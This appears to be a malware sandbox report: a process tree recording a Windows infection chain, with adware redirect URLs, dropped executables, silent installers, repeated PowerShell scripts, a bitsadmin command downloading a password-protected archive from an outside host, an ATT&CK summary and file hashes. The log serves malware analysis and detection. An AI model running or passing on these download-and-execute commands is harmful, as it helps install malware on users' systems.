C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9e48546f8,0x7ff9e4854708,0x7ff9e485471810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=18514839⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9e48546f8,0x7ff9e4854708,0x7ff9e485471810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=18515139⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9e48546f8,0x7ff9e4854708,0x7ff9e485471810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.directdexchange.com/jump/next.php?r=20872159⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9e48546f8,0x7ff9e4854708,0x7ff9e485471810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.directdexchange.com/jump/next.php?r=42631199⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9e48546f8,0x7ff9e4854708,0x7ff9e485471810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?id=12942319⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9e48546f8,0x7ff9e4854708,0x7ff9e485471810⤵
-
C:\Users\Admin\AppData\Local\Temp\64-adea2-d79-4c2a6-51de532b86842\Vonacoreqa.exe"C:\Users\Admin\AppData\Local\Temp\64-adea2-d79-4c2a6-51de532b86842\Vonacoreqa.exe"8⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\4ol2ric5.d2d\installer.exe /qn CAMPAIGN="654" & exit9⤵
-
C:\Users\Admin\AppData\Local\Temp\4ol2ric5.d2d\installer.exeC:\Users\Admin\AppData\Local\Temp\4ol2ric5.d2d\installer.exe /qn CAMPAIGN="654"10⤵
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\4ol2ric5.d2d\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\4ol2ric5.d2d\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1633365428 /qn CAMPAIGN=""654"" " CAMPAIGN="654"11⤵
- Enumerates connected drives
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ojxdrcab.0sx\any.exe & exit9⤵
-
C:\Users\Admin\AppData\Local\Temp\ojxdrcab.0sx\any.exeC:\Users\Admin\AppData\Local\Temp\ojxdrcab.0sx\any.exe10⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\qva1kxpe.3fm\DownFlSetup122.exe & exit9⤵
-
C:\Users\Admin\AppData\Local\Temp\qva1kxpe.3fm\DownFlSetup122.exeC:\Users\Admin\AppData\Local\Temp\qva1kxpe.3fm\DownFlSetup122.exe10⤵
-
C:\Users\Admin\AppData\Roaming\8273011.scr"C:\Users\Admin\AppData\Roaming\8273011.scr" /S11⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ioxsjw32.qyl\Browser4Download.exe & exit9⤵
-
C:\Users\Admin\AppData\Local\Temp\ioxsjw32.qyl\Browser4Download.exeC:\Users\Admin\AppData\Local\Temp\ioxsjw32.qyl\Browser4Download.exe10⤵
-
C:\Users\Admin\AppData\Roaming\2113420.scr"C:\Users\Admin\AppData\Roaming\2113420.scr" /S11⤵
-
C:\Users\Admin\AppData\Roaming\2785272.scr"C:\Users\Admin\AppData\Roaming\2785272.scr" /S11⤵
- Suspicious behavior: SetClipboardViewer
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\tp1qep3v.2of\cust2.exe & exit9⤵
-
C:\Users\Admin\AppData\Local\Temp\tp1qep3v.2of\cust2.exeC:\Users\Admin\AppData\Local\Temp\tp1qep3v.2of\cust2.exe10⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\lkm4dn1w.kb1\autosubplayer.exe /S & exit9⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV110⤵
-
C:\Users\Admin\AppData\Local\Temp\lkm4dn1w.kb1\autosubplayer.exeC:\Users\Admin\AppData\Local\Temp\lkm4dn1w.kb1\autosubplayer.exe /S10⤵
- Loads dropped DLL
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsdA7EB.tmp\tempfile.ps1"11⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsdA7EB.tmp\tempfile.ps1"11⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsdA7EB.tmp\tempfile.ps1"11⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsdA7EB.tmp\tempfile.ps1"11⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsdA7EB.tmp\tempfile.ps1"11⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsdA7EB.tmp\tempfile.ps1"11⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsdA7EB.tmp\tempfile.ps1"11⤵
- Checks for any installed AV software in registry
-
C:\Windows\SysWOW64\bitsadmin.exe"bitsadmin" /Transfer helper http://lighteningstoragecenter.com/data/data.7z C:\zip.7z11⤵
- Download via BitsAdmin
-
C:\Program Files (x86)\lighteningplayer\data_load.exe"C:\Program Files (x86)\lighteningplayer\data_load.exe" -pPbRz4ETRZ9bWlRf -y x C:\zip.7z -o"C:\Program Files\temp_files\"11⤵
-
C:\Program Files (x86)\lighteningplayer\data_load.exe"C:\Program Files (x86)\lighteningplayer\data_load.exe" -pnczkWtKvNiK8PYi -y x C:\zip.7z -o"C:\Program Files\temp_files\"11⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsdA7EB.tmp\tempfile.ps1"11⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsdA7EB.tmp\tempfile.ps1"11⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsdA7EB.tmp\tempfile.ps1"11⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsdA7EB.tmp\tempfile.ps1"11⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsdA7EB.tmp\tempfile.ps1"11⤵
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\System32\rundll32.exe "C:\Program Files (x86)\SMBbvCSuKLI\SMBbvCSuKLI.dll" SMBbvCSuKLI11⤵
-
C:\Windows\system32\rundll32.exeC:\Windows\System32\rundll32.exe "C:\Program Files (x86)\SMBbvCSuKLI\SMBbvCSuKLI.dll" SMBbvCSuKLI12⤵
- Drops file in System32 directory
- Drops file in Windows directory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsdA7EB.tmp\tempfile.ps1"11⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsdA7EB.tmp\tempfile.ps1"11⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsdA7EB.tmp\tempfile.ps1"11⤵
- Drops file in Program Files directory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsdA7EB.tmp\tempfile.ps1"11⤵
-
C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe"C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT11⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\so2hbdtn.lkf\installer.exe /qn CAMPAIGN=654 & exit9⤵
-
C:\Users\Admin\AppData\Local\Temp\so2hbdtn.lkf\installer.exeC:\Users\Admin\AppData\Local\Temp\so2hbdtn.lkf\installer.exe /qn CAMPAIGN=65410⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri10acd1e0a9e6.exe /mixone4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS830B9DE0\Fri10acd1e0a9e6.exeFri10acd1e0a9e6.exe /mixone5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5280 -s 2446⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri10720d229511df563.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS830B9DE0\Fri10720d229511df563.exeFri10720d229511df563.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5148 -s 18766⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri10d184202996a0d7f.exe4⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri1018ef4aa251c026c.exe4⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri106e757f6d75.exe4⤵
-
C:\Windows\System32\sihclient.exeC:\Windows\System32\sihclient.exe /cv 92GwURs0+UOTl7UTHcO7Cw.0.21⤵
- Modifies data under HKEY_USERS
-
C:\Users\Admin\AppData\Local\Temp\7zS830B9DE0\Fri1018ef4aa251c026c.exeFri1018ef4aa251c026c.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zS830B9DE0\Fri10d184202996a0d7f.exeFri10d184202996a0d7f.exe1⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\7zS830B9DE0\Fri106e757f6d75.exeFri106e757f6d75.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\7zS830B9DE0\Fri106e757f6d75.exeC:\Users\Admin\AppData\Local\Temp\7zS830B9DE0\Fri106e757f6d75.exe2⤵
- Executes dropped EXE
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5404 -s 4643⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5404 -s 4643⤵
- Program crash
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 5732 -ip 57321⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 5404 -ip 54041⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 5148 -ip 51481⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 4736 -ip 47361⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 6544 -ip 65441⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 624 -p 5280 -ip 52801⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 5732 -ip 57321⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 5732 -ip 57321⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Executes dropped EXE
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 6288 -ip 62881⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 676 -p 2340 -ip 23401⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 636 -p 6304 -ip 63041⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 620 -p 5732 -ip 57321⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 696 -p 6512 -ip 65121⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 728 -p 1104 -ip 11041⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 6544 -ip 65441⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 612 -p 6200 -ip 62001⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 5732 -ip 57321⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 700 -p 6380 -ip 63801⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s BITS1⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 720 -p 5732 -ip 57321⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 704 -p 6372 -ip 63721⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Users\Admin\AppData\Local\Temp\2987.exeC:\Users\Admin\AppData\Local\Temp\2987.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\2987.exeC:\Users\Admin\AppData\Local\Temp\2987.exe2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Local\Temp\34C3.exeC:\Users\Admin\AppData\Local\Temp\34C3.exe1⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\34C3.exeC:\Users\Admin\AppData\Local\Temp\34C3.exe2⤵
-
C:\Users\Admin\AppData\Local\Temp\6AF7.exeC:\Users\Admin\AppData\Local\Temp\6AF7.exe1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7084 -s 2362⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 768 -p 5540 -ip 55401⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 6340 -ip 63401⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Users\Admin\AppData\Local\Temp\8FD5.exeC:\Users\Admin\AppData\Local\Temp\8FD5.exe1⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 728 -p 6720 -ip 67201⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 7084 -ip 70841⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Users\Admin\AppData\Local\Temp\E411.exeC:\Users\Admin\AppData\Local\Temp\E411.exe1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7508 -s 2402⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\AppData\Local\Temp\F8D2.exeC:\Users\Admin\AppData\Local\Temp\F8D2.exe1⤵
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 13792 -s 5403⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Windows directory
- Modifies data under HKEY_USERS
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 0F57A366D35FF6DDFCDF7986CBD2BC12 C2⤵
- Loads dropped DLL
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 22B41F13299B10DFD7D230396F67696D2⤵
- Blocklisted process makes network request
- Loads dropped DLL
-
C:\Windows\SysWOW64\taskkill.exe"C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f3⤵
- Kills process with taskkill
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding C9835656C6CDFE4600B444EDCD183862 E Global\MSI00002⤵
- Drops file in Windows directory
-
C:\Users\Admin\AppData\Local\Temp\170A.exeC:\Users\Admin\AppData\Local\Temp\170A.exe1⤵
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7420 -s 4482⤵
- Program crash
- Enumerates system info in registry
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 7420 -ip 74201⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Users\Admin\AppData\Local\Temp\2274.exeC:\Users\Admin\AppData\Local\Temp\2274.exe1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7340 -s 2642⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo1⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Suspicious use of SetThreadContext
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 7508 -ip 75081⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 7340 -ip 73401⤵
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8248 -s 4563⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 8248 -ip 82481⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 13792 -ip 137921⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
- Drops file in Windows directory
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
- Drops file in Windows directory
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s BITS1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s BITS1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s BITS1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s BITS1⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Persistence
Modify Existing Service
1Registry Run Keys / Startup Folder
1Scheduled Task
1BITS Jobs
1Defense Evasion
Modify Registry
3Disabling Security Tools
1Virtualization/Sandbox Evasion
1BITS Jobs
1Install Root Certificate
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Fri106e757f6d75.exe.logMD5
e07da89fc7e325db9d25e845e27027a8
SHA14b6a03bcdb46f325984cbbb6302ff79f33637e19
SHA25694ab73c00494d10a2159175b81e23047621451e3a566e5a0b1222379db634aaf
